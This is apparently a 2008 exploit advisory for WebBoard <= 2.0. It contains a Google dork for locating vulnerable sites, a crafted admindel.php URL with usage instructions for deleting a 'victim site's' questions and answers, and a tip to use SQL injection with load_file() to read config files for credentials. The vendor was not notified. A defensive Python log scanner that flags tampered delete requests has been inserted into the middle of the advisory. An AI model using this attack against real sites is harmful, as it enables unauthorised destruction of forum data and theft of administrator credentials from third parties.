-[*]+================================================================================+[*]-
-[*]+ WebBoard <= 2.0 Arbitrary SQL Question/Answer Delete Vulnerability +[*]-
-[*]+================================================================================+[*]-

[*] Discovered By: t0pP8uZz
[*] Discovered On: 20 AUGUST 2008
[*] Script Download: N/A
[*] DORK (google): "and Powered By :Sansak"

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION/USAGE:

WebBoard suffers from remote vulnerabilities. Included in this writeup is a method to
arbitrarily delete the questions and answers from the board. It is also possible to execute SQL queries.

Once you have found a vulnerable website (shouldn't be hard from 2k+ vuln sites), modify the URL
below to include the victim site's domain, and change the <NUM> tags to a valid question/answer number.
Execute the URL, and the question and answers will be deleted.

You can also use SQL injection in place of the <NUM> tags; use load_file() to view the config file
for usernames and passwords.

[*] Vulnerability:
http://site.com/webboard/admindel.php?action=delete&mode=question&qno=<NUM>&ano=<NUM>
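
A defender-side check for the request pattern above, as an added example that is not part of the original advisory: it scans web-server access logs for delete requests to admindel.php and separates out those whose qno/ano values are not plain integers. The log lines are constructed, and the combined log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); addresses are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Aug/2008:10:01:12 +0000] "GET /webboard/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [25/Aug/2008:10:01:15 +0000] "GET /webboard/admindel.php'
    '?action=delete&mode=question&qno=12&ano=3 HTTP/1.1" 200 310',
    '203.0.113.9 - - [25/Aug/2008:10:02:40 +0000] "GET /webboard/admindel.php'
    '?action=delete&mode=question&qno=12%27&ano=3 HTTP/1.1" 200 310',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
STRICT_INT = re.compile(r"[0-9]+")

def classify(line):
    """Return a finding dict for a delete request to admindel.php, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith("/admindel.php"):
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes values
    if params.get("action", [""])[0].lower() != "delete":
        return None
    ids = {name: params.get(name, []) for name in ("qno", "ano")}
    values = [v for vals in ids.values() for v in vals]
    # A legitimate question/answer number is a plain integer; anything else
    # means the parameter carried extra text and may have reached the SQL query.
    tampered = any(not STRICT_INT.fullmatch(v) for v in values)
    return {
        "client": client,
        "status": int(status),
        "ids": ids,
        "finding": "non-numeric-id" if tampered else "delete-request",
    }

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["finding"], hit["client"], hit["ids"])
```

Plain `delete-request` hits are still worth correlating with known administrator activity.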

[*] NOTE/TIP:

null

[*] GREETZ:

milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !

[-] Peace...

...t0pP8uZz !

-[*]+================================================================================+[*]-
-[*]+ WebBoard <= 2.0 Arbitrary SQL Question/Answer Delete Vulnerability +[*]-
-[*]+================================================================================+[*]-

# milw0rm.com [2008-08-25]